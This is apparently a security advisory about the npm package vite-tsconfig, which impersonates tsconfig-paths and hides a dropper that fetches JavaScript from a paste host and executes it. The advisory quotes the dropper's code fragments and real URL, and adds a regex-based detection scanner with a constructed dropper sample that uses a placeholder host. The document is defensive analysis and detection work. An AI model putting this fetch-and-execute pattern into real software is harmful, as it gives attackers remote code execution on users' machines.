CRITICAL npm Malware

Malicious code in vite-tsconfig (npm)

MAL-2026-5576

Description

Source: amazon-inspector (88e76d2cfe72140b4419a881bd3271d2fb1f246444a8418f6decfd81a76dd17c)

Package impersonates the popular tsconfig-paths library (description: 'Load node modules according to tsconfig paths') but ships a hidden remote-code-execution dropper.

The exported configJson API in lib/index.js spawns lib/mapProps.js as a detached Node subprocess with child_process.spawn('node', [script,...], {detached:true, stdio:'ignore'}). mapProps.js performs axios.get('https://www.jsonkeeper.com/b/LVKHJ'), reads response.data.Cookie, and executes the returned string with new Function('require', s)(require), so opaque attacker-controlled JavaScript runs with full Node privileges and access to require. The fetch is retried up to 5 times.

The dropper is disguised by a fake local process object shadowing Node's global (const process = { env: { DEV_API_KEY: 'https://www.jsonkeeper.com/b/LVKHJ', DEV_SECRET_KEY: 'x-secret-key', DEV_SECRET_VALUE: '_' } }), so the URL and header look like benign environment-variable lookups, and by reading the payload from a field named Cookie to mimic session handling. lib/register.js even prints 'vite-json will be skipped', revealing inconsistent internal naming.

The fetch source jsonkeeper.com is an anonymous, mutable paste host with no integrity verification, allowing the attacker to swap the executed payload at any time.
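The traits described above (a shadowed process object, a detached spawn with stdio ignored, new Function(...)(require) over fetched text, and an untrusted remote host) are all visible in the package source before anything runs. The heuristic scanner below is an added example, not code from the advisory or from the package; the two sample sources it scans are constructed, and the paste host in the dropper sample is a placeholder rather than the real URL.

```javascript
// Heuristic static scan for the dropper traits the advisory describes.
// Added example, not code from the advisory or the package; the samples below are constructed.
const RULES = [
  { id: 'shadowed-process', why: 'a local object shadows the Node global `process`',
    re: /\b(?:const|let|var)\s+process\s*=\s*\{/ },
  { id: 'detached-spawn', why: 'spawns a detached child with stdio ignored',
    re: /spawn\s*\([\s\S]{0,300}?detached\s*:\s*true[\s\S]{0,100}?stdio\s*:\s*['"]ignore['"]/ },
  { id: 'function-from-string', why: 'new Function(...)(require) runs text with require in scope',
    re: /new\s+Function\s*\(\s*['"]require['"][\s\S]{0,200}?\)\s*\(\s*require\s*\)/ },
  { id: 'http-client', why: 'fetches remote content at runtime',
    re: /\b(?:axios\.get|fetch|https?\.get)\s*\(/ },
];
// Hosts referenced by URL literals anywhere in the file, so a URL hidden in a fake env object still shows up.
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Returns { findings, hosts, verdict } for one source file's text.
function scanSource(source, trustedHosts = ['registry.npmjs.org']) {
  const findings = RULES.filter(r => r.re.test(source)).map(({ id, why }) => ({ id, why }));
  const hosts = [...new Set([...source.matchAll(URL_RE)].map(m => m[1].toLowerCase()))]
    .filter(h => !trustedHosts.includes(h));
  const ids = new Set(findings.map(f => f.id));
  let verdict = 'clean';
  // String-to-code plus any remote source is the dropper shape; other combinations need a human look.
  if (ids.has('function-from-string') && (ids.has('http-client') || hosts.length)) verdict = 'critical';
  else if (ids.size >= 2 || (ids.size && hosts.length)) verdict = 'suspicious';
  else if (ids.size) verdict = 'review';
  return { findings, hosts, verdict };
}

// Constructed sample mirroring the described layout; placeholder host, not the real paste URL.
const DROPPER_SAMPLE = `
const process = { env: { DEV_API_KEY: 'https://paste.example.invalid/b/PLACEHOLDER', DEV_SECRET_KEY: 'x-secret-key' } };
const { spawn } = require('child_process');
const axios = require('axios');
spawn('node', [__dirname + '/mapProps.js'], { detached: true, stdio: 'ignore' }).unref();
axios.get(process.env.DEV_API_KEY).then(r => new Function('require', r.data.Cookie)(require));
`;
// Constructed benign sample: spawns a child, but attached, with no remote fetch or string-to-code.
const BENIGN_SAMPLE = `
const { spawn } = require('child_process');
module.exports = (cmd) => spawn(cmd, [], { stdio: 'inherit' });
`;

console.log(scanSource(DROPPER_SAMPLE).verdict, scanSource(BENIGN_SAMPLE).verdict); // critical clean
```

Run it over each file in node_modules/<package>/lib to triage a suspect install; the verdict is a heuristic for prioritising review, not a proof of either safety or malice.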
